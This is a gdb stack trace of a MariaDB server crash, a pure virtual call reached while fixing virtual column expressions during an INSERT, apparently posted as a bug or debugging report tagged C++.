#6  0x00007f9fe955ec8a in \_\_cxxabiv1::\_\_terminate (handler=<optimized out>) at /build/gcc/src/gcc/libstdc++-v3/libsupc++/eh\_terminate.cc:48

#7  0x00007f9fe955ecf7 in std::terminate () at /build/gcc/src/gcc/libstdc++-v3/libsupc++/eh\_terminate.cc:58

#8  0x00007f9fe955fa75 in \_\_cxxabiv1::\_\_cxa\_pure\_virtual () at /build/gcc/src/gcc/libstdc++-v3/libsupc++/pure.cc:50

#9  0x00005561380a4308 in Item::check\_type\_scalar (this=this@entry=0x629000089440, opname=...) at /experiment/mariadb-server/sql/item.cc:1121

#10 0x00005561381e2a5b in Item\_func::check\_argument\_types\_scalar (this=0x6190000a3ed8, start=<optimized out>, end=<optimized out>) at /experiment/mariadb-server/sql/item\_func.cc:271

#11 0x00005561381ce34e in Item\_func::fix\_fields (this=this@entry=0x6190000a3ed8, thd=<optimized out>, ref=<optimized out>) at /experiment/mariadb-server/sql/item\_func.cc:357

#12 0x0000556138100700 in Item\_func\_case::fix\_fields (this=0x6190000a3ed8, thd=<optimized out>, ref=<optimized out>) at /experiment/mariadb-server/sql/item\_cmpfunc.cc:3131

#13 0x0000556137be6ee2 in fix\_vcol\_expr (thd=<optimized out>, vcol=0x61d0000532b8) at /experiment/mariadb-server/sql/table.cc:3588

#14 0x000055613775e1ca in TABLE::fix\_vcol\_exprs (this=0x6190000a3298, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.cc:5429

#15 0x000055613775ef93 in fix\_all\_session\_vcol\_exprs (tables=0x6290000873b8, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.cc:5465

#16 lock\_tables (thd=thd@entry=0x62b0000bd218, tables=0x6290000873b8, count=<optimized out>, flags=flags@entry=0) at /experiment/mariadb-server/sql/sql\_base.cc:5649

#17 0x0000556137763800 in open\_and\_lock\_tables (thd=thd@entry=0x62b0000bd218, options=..., tables=<optimized out>, tables@entry=0x6290000873b8, derived=derived@entry=true, flags=flags@entry=0, prelocking\_strategy=prelocking\_strategy@entry=0x7f9fca4512d0) at /experiment/mariadb-server/sql/sql\_base.cc:5261

#18 0x0000556137819ef4 in open\_and\_lock\_tables (flags=0, derived=true, tables=0x6290000873b8, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.h:509

#19 mysql\_insert (thd=thd@entry=0x62b0000bd218, table\_list=0x6290000873b8, fields=..., values\_list=..., update\_fields=..., update\_values=..., duplic=<optimized out>, ignore=<optimized out>, result=<optimized out>) at /experiment/mariadb-server/sql/sql\_insert.cc:757

#20 0x00005561378d2bb8 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:4565

#21 0x00005561378df5a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#22 0x00005561378e560c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#23 0x00005561378ea73d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#24 0x0000556137ca5e57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#25 0x0000556137ca633d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#26 0x0000556138736c2c in pfs\_spawn\_thread (arg=0x617000005f18) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#27 0x00007f9fe96df259 in start\_thread () from /usr/lib/libpthread.so.0

#28 0x00007f9fe928a5e3 in clone () from /usr/lib/libc.so.6

Tag

#c++